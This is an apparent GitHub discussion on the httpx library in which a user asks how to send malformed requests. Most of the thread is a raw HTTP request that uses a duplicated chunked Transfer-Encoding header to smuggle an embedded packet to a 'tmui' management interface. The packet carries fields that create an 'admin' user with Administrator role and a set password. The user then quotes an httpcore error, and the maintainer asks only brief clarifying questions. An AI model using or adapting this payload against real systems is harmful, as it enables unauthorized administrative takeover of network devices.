### DISCUSSION TITLE
How to use httpx to send some malformed requests

### DISCUSSION THREAD

**Discussion by C1ph3rX13** [encode/httpx#2919] [Q&A]
How to use httpx to send some malformed requests

For example
POST /xxx/login.jsp HTTP/1.1
Host: 192.168.84.129
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked,chunked
Content-Length: 524

204		
�HTTP/1.1�/xxx/xxxx/form	127.0.0.1	localhost	localhostP��Tmui-Dubbuf�BBBBBBBBBBB
REMOTEROLE�0��	localhost��admin��q_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=admin&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=�
0

**Comment by C1ph3rX13** [comment]
httpx cannot use "Transfer-Encoding: chunked, chunked". Is there any way to use it?

**Reply by lovelydinosaur** [reply]
Why not?

**Reply by C1ph3rX13** [reply]
Because

httpcore.LocalProtocolError: Only Transfer-Encoding: chunked is supported

**Reply by lovelydinosaur** [reply]
Where's that initially raised?
